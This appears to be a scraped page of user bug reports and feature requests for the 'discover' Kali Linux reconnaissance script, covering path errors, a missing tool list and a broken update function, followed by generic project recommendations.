./discover.sh: line 773: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/passive-recon.htm: No such file or directory
./discover.sh: line 773: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/passive-recon.htm: No such file or directory
/root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/images/robtex.png: No such file or directory

Add list of tools

It would be nice, if you added a complete list of the tools you use in the script. Sure you can use the "kali-linux-full" metapackage for creating a docker image for example but it is way more efficient using only the appropriate tools and packages.

Person searching

When I tested using non-english params, discover doesn't work properly.Like as my name

No such file or directory

Hi,
when i try perform update function in menu "15. Update", i got an error "./discover.sh: line 3986: /update.sh: No such file or directory".
And i discovered that, in discover.sh file, the command in line 31 was not get correct path of file and $discover var is empty.
After i add command "updatedb" before line 31, it run correctly.
i use kali 2016.1 - Kali Rolling.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.